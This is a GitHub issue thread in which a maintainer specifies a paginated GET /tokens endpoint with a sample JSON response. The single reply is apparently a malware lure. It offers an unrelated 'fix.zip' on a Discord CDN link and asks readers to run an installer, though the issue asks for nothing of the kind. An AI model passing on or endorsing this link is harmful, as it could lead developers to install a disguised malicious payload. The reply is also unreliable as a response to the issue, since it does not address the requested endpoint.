### ISSUE TITLE
Create request GET /tokens

### ISSUE THREAD

**Issue by dmitry575** [crispmindltd/light_node_tectum#10]
Need return list of tokens created clients

GET /tokens?rows=10&skip=0
```
{
  "tokens": [
      {
        "date": 1234,                       //date create token
        "name": "Token name",       // block number
        "ticker": "Tiecked",              // token ticker
        "amount": 1000,                 // how many tokens was created
        "decimals": 2,                      // precision, number of decimal places
        "info": "Full information",   // full information about token
        "address": "0x1234"           // token address
      },
...
]
```
`rows` - count of transactions
`skip` - count how many trasanction need to skip

default value rows = 20
default value skip = 0

max value rows = 50

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
